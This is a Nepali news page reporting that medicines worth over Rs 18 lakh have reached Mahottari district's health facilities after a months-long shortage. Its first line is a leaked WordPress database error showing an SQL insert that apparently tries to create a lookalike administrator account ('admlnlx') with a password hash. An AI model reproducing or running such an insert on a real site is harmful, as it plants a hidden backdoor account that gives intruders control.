WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoUPvBDdCtKwBLUBazrMrgMoubvtal/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 17:33:15', '', 'admlnlx', 'admlnlx')
गौशाला, माघ २४–
महिनौँदेखि औषधि अभाव रहेको महोत्तरी जिल्लामा औषधि आएको छ ।
जिल्ला स्वास्थ्य प्रमुख डा मनिष पाण्डेका अनुसार महोत्तरी जिल्लाको जिल्ला अस्पतालसहित विभिन्न अस्पताल, स्वास्थ्यचौकी, उपस्वास्थ्यचौकी र स्वास्थ्य केन्द्रका लागि रु १८ लाखभन्दा बढीको औषधि आएको छ ।
डा पाण्डेले प्राप्त औषधिले अब जिल्लाको विभिन्न स्वास्थ्य संस्थालाई आउँदो तीन महिनासम्म पुग्ने तथा थप औषधि आपूर्तिका लागि आफूहरु पुनः प्रयासरत रहेको र चाँडै आउने बताउनुभयो । जिल्लाका विभिन्न स्वास्थ्य संस्थामा पाँच महिनादेखि औषधिको अभाव रहेको थियोे ।
साथै प्राप्त औषधिहरु माघको अन्तिमसम्म जिल्लाको प्रत्येक स्वास्थ्य संस्थामा पुगिसक्ने र सेवाग्राहीले अब थप समस्या झेल्नु नपर्ने डा पाण्डेले बताउनुभयो ।